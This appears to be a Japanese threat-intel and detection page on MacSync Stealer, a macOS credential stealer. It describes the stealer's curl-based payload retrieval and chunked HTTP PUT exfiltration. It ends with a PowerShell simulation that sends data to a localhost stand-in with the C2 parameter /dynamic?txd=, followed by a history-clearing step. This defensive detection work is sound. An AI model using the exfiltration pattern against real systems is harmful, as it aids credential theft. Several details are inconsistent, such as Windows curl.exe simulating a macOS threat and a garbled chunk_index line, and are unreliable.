SOC Prime Bias: High

20 Aug 2026 07:15 UTC

行動分析でMacSync Stealerインフラを追跡

Author Photo
SOC Prime Team linkedin icon フォローする
行動分析でMacSync Stealerインフラを追跡
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

概要

MacSync Stealerは、急速に回転するコマンドアンドコントロールインフラストラクチャに依存したmacOS向けの情報スティーラーです。このマルウェアは、macOSキー チェーンの内容、ブラウザの資格情報、SSHキー、クラウドの資格情報を含む貴重なデータを標的としています。そのスクリプト駆動の攻撃チェーンは、ソーシャル エンジニアリング、 curlを通じたペイロードの取得、およびHTTP PUTリクエストを使用したチャンク化されたデータの流出を組み合わせています。

調査

Microsoft Defender Expertsは、静的なドメインインジケーターに依存せず、再発するエンドポイントとネットワークの動作を関連付けることで脅威を特定しました。調査により、特定のURIパス、macOS User-Agent文字列、特徴的なアップロードパラメータなどの持続可能な行動を軸にして30を超えるドメインが関連付けられました。このアプローチにより、初期のペイロード取得からデータのステージングおよび最終的な流出に至る活動を研究者が追跡することが可能になりました。

緩和策

組織は、疑わしい貼り付けて実行するワークフローを制限するプラットフォーム制御とセキュリティの意識を通じて、ユーザーによるターミナル実行のリスクを軽減すべきです。無許可のアクセスからmacOSキー チェーンやブラウザプロファイルなどの認証ストアを保護することが重要です。macOSユーティリティの不審な組み合わせと異常なHTTP PUTアップロードの監視は、アクティブなデータ流出を検出するのにも役立ちます。

対応

MacSync Stealerの活動が検出された場合、レスポンダーは疑わしいシェルおよびAppleScript実行をアウトバウンドネットワークのテレメトリと関連付けるべきです。調査者は、 /tmp/ などの一時的な場所でのアーカイブ作成を確認し、機密ファイルへの無許可のアクセスを特定すべきです。ネットワーク活動もまた、 curl chunk_index chunk_index, chunk_indexなどのアップロード識別子を含むリクエストについてレビューする必要があります。 total_chunks.

攻撃フロー

この部分はまだ更新中です。

検出

疑わしいCurl実行試行[MacOS](コマンドライン経由)

SOCプライムチーム
2026年8月19日

MacOS一時フォルダ内でのアーカイブ作成(ファイルイベント経由)

SOCプライムチーム
2026年8月19日

MacSync Stealer C2およびデータ流出パターンの検出[ウェブサーバー]

SOCプライムAIルール
2026年8月19日

MacSync Stealerの初期ペイロード取得およびAppleScript実行の検出[Linuxプロセス作成]

SOCプライムAIルール
2026年8月19日

シミュレーション実行

前提条件: テレメトリとベースラインの事前チェックをパスする必要があります。

論拠: このセクションは、検出ルールのトリガーを目的とした敵の技術(TTP)の正確な実行を詳細に説明します。コマンドと説明文は、特定されたTTPを直接反映し、検出ロジックが期待する正確なテレメトリを生成することを目指します。抽象的または無関係な例は誤診を引き起こします。

  • 攻撃の説明とコマンド: 攻撃者は、MacSync Stealerをターゲットのウェブサーバーに展開することに成功しました。資格情報や機密システム情報を収集した後、攻撃者はこのデータをコマンドアンドコントロール(C2)サーバーに流出させようとしています。標準的な管理トラフィックと溶け込むため、そして単純なシグネチャベースのツールによる検出を回避するため、攻撃者は curl.exe を利用して盗まれたデータを送信します。攻撃者は /dynamic?txd= という特定の悪意あるURIパラメータをリクエストに付加して送信し、これはMacSync C2インフラストラクチャの既知のシグネチャです。

  • 回帰テストスクリプト:

    # MacSync Stealer C2検出ルールをトリガーするためのシミュレーションスクリプト
    # このコマンドは、悪意あるURIパターンとともにシミュレートされたC2エンドポイントにcurlを使用して接続します。
    
    $target_url = "http://127.0.0.1/dynamic?txd=malicious_payload_data"
    Write-Host "MacSync Stealer C2通信をシミュレート中..."
    curl.exe $target_url
  • クリーンアップコマンド:

    # このシミュレーションでは永続的なファイルは作成されません。
    # しかし、必要に応じてローカルの履歴をクリアしてください。
    Clear-History